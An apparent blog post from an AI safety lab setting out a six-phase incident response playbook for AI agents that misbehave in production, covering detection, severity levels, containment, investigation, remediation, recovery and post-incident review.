15 Research Lab -Adversarial Safety Evaluation of Frontier AI Systems

John Kearney

AI Agent Incident Response Playbook

February 16, 202615 Research Lab

agent-safetycompliancemethodology

When an AI agent does something wrong in production, you need a plan. Not a meeting to discuss what to do. A plan that your team can execute immediately.

Phase 1: Detection

Incidents are detected through:

Monitoring alerts: Behavioral anomaly detection (Sentinel) flags unusual patterns
Policy engine logs: Spike in denied actions, unusual tool call patterns
User reports: A user notices the agent behaving incorrectly
Audit trail review: Periodic review discovers past anomalous behavior
External notification: A security researcher or partner reports a vulnerability

Classify the incident by severity:

P1 (Critical): Active data exfiltration, unauthorized financial transactions, ongoing compromise
P2 (High): Unauthorized tool access detected, policy bypass discovered, potential data exposure
P3 (Medium): Anomalous behavior without confirmed impact, failed attack attempts
P4 (Low): Minor policy violations, single erroneous tool calls, no sensitive data involved

Phase 2: Containment

For P1/P2 incidents:

Activate the kill switch for the affected agent/session
Revoke the agent's authentication tokens
If data exfiltration is suspected, block the destination endpoints at the network level
Preserve all logs and receipts (ensure no automated cleanup runs)
Notify the incident response team

For P3/P4 incidents:

Increase monitoring sensitivity for the affected agent
Lower policy thresholds (more actions require approval)
Flag the session for review
Continue monitoring

Phase 3: Investigation

Walk the receipt chain from session start to incident:

What was the conversation flow?
When did behavior change?
Was there adversarial input? (check for injection patterns)
Which tool calls were made? Were any denied before the incident?
What data did the agent have access to?
Did monitoring fire alerts before the incident?

Determine root cause:

Prompt injection: Identify the injection vector and payload
Policy gap: Identify the rule that should have blocked the action
Model error: Determine if the model hallucinated or misinterpreted instructions
Configuration error: Check for misdeployed policies or system prompts

Phase 4: Remediation

Based on root cause:

Prompt injection: Add the payload to your scanner patterns. Test for variants. Tighten policy rules around the exploited tool.
Policy gap: Write the missing rule. Test it against the incident scenario. Deploy.
Model error: Review the system prompt for ambiguity. Add explicit constraints. Consider model change if errors are frequent.
Configuration error: Fix the configuration. Add validation to your deployment pipeline.

Phase 5: Recovery

Verify the fix by replaying the incident scenario against the updated system
Restore the agent with updated policies and scanning rules
Monitor closely for the first 24 hours after restoration
Verify that the receipt chain integrity is intact

Phase 6: Post-Incident Review

Within 48 hours, conduct a review covering:

What happened and when
How was it detected and how long did detection take
What was the impact
What was the root cause
What remediation was applied
What systemic improvements are needed (process, tooling, training)

Document the review. Add the incident to your red team test corpus. Update your risk register.

Keep this playbook accessible to your operations team. Review and update it quarterly.